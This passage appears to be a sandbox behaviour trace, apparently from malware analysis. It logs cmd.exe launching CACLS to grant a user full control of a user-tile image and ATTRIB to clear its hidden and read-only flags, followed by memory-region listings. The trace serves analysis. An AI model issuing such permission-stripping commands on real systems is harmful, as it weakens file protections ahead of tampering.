(_String1="FOR", _String2="ATTRIB") returned 5 [0191.324] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0191.324] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0191.324] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0191.324] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0191.324] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0191.326] GetConsoleTitleW (in: lpConsoleTitle=0x1cf474, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.326] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.326] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.326] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.326] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.326] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.327] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.327] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.327] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.327] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.327] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.327] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.327] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.327] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.328] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.328] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.328] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.328] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.328] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.328] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.328] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.328] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.328] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.328] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.328] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.328] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0191.328] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0191.328] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0191.329] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0191.329] SetErrorMode (uMode=0x0) returned 0x0 [0191.329] SetErrorMode (uMode=0x1) returned 0x0 [0191.329] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x281e98, lpFilePart=0x1cef94 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cef94*="Desktop") returned 0x18 [0191.329] SetErrorMode (uMode=0x0) returned 0x1 [0191.329] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.329] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.334] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.334] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x282180 [0191.335] FindClose (in: hFindFile=0x282180 | out: hFindFile=0x282180) returned 1 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x282180 [0191.335] FindClose (in: hFindFile=0x282180 | out: hFindFile=0x282180) returned 1 [0191.335] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.336] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.336] GetConsoleTitleW (in: lpConsoleTitle=0x1cf208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.338] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf090, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf158 | out: lpAttributeList=0x1cf090, lpSize=0x1cf158) returned 1 [0191.338] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf090, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf150, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf090, lpPreviousValue=0x0) returned 1 [0191.338] GetStartupInfoW (in: lpStartupInfo=0x1cf04c | out: lpStartupInfo=0x1cf04c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.338] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.339] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf0ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf138 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf138*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0xa78)) returned 1 [0191.342] CloseHandle (hObject=0x4c) returned 1 [0191.342] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.342] GetEnvironmentStringsW () returned 0x280308* [0191.342] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.342] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.448] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf02c | out: lpExitCode=0x1cf02c*=0x0) returned 1 [0191.448] CloseHandle (hObject=0x50) returned 1 [0191.448] _vsnwprintf (in: _Buffer=0x1cf174, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf038 | out: _Buffer="00000000") returned 8 [0191.448] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.449] GetEnvironmentStringsW () returned 0x282410* [0191.449] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.449] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.449] GetEnvironmentStringsW () returned 0x282410* [0191.449] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.449] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf090 | out: lpAttributeList=0x1cf090) [0191.449] GetConsoleTitleW (in: lpConsoleTitle=0x1cf474, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.449] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x27e4d8 [0191.450] FindClose (in: hFindFile=0x27e4d8 | out: hFindFile=0x27e4d8) returned 1 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x27e4d8 [0191.450] FindClose (in: hFindFile=0x27e4d8 | out: hFindFile=0x27e4d8) returned 1 [0191.451] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.451] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.451] GetConsoleTitleW (in: lpConsoleTitle=0x1cf208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.451] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf090, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf158 | out: lpAttributeList=0x1cf090, lpSize=0x1cf158) returned 1 [0191.451] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf090, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf150, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf090, lpPreviousValue=0x0) returned 1 [0191.451] GetStartupInfoW (in: lpStartupInfo=0x1cf04c | out: lpStartupInfo=0x1cf04c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.451] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.451] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf0ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf138 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessInformation=0x1cf138*(hProcess=0x4c, hThread=0x50, dwProcessId=0x740, dwThreadId=0x134)) returned 1 [0191.452] CloseHandle (hObject=0x50) returned 1 [0191.452] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.453] GetEnvironmentStringsW () returned 0x282410* [0191.453] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.453] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.526] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf02c | out: lpExitCode=0x1cf02c*=0x0) returned 1 [0191.526] CloseHandle (hObject=0x4c) returned 1 [0191.527] _vsnwprintf (in: _Buffer=0x1cf174, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf038 | out: _Buffer="00000000") returned 8 [0191.527] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.527] GetEnvironmentStringsW () returned 0x282410* [0191.527] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.527] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.527] GetEnvironmentStringsW () returned 0x282410* [0191.527] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.527] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf090 | out: lpAttributeList=0x1cf090) [0191.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.527] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.527] SetConsoleInputExeNameW () returned 0x1 [0191.527] GetConsoleOutputCP () returned 0x1b5 [0191.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.528] exit (_Code=0) Process: id = "427" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "426" os_parent_pid = "0x8f8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28060 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28061 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28062 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28063 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28064 start_va = 0xb00000 end_va = 0xb08fff entry_point = 0xb00000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28065 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28066 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28067 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28068 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28069 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28070 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28071 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28072 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28073 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28074 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 28075 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28076 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28077 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28078 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28079 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28080 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28081 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 611 os_tid = 0xa78 Thread: id = 612 os_tid = 0x990 Process: id = "428" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0x740" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "426" os_parent_pid = "0x8f8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28082 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28083 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28084 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28085 start_va = 0x60000 end_va = 0x66fff entry_point = 0x60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28086 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28087 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28088 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28089 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28090 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28091 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28092 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28093 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28094 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28095 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 28096 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 28097 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28098 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 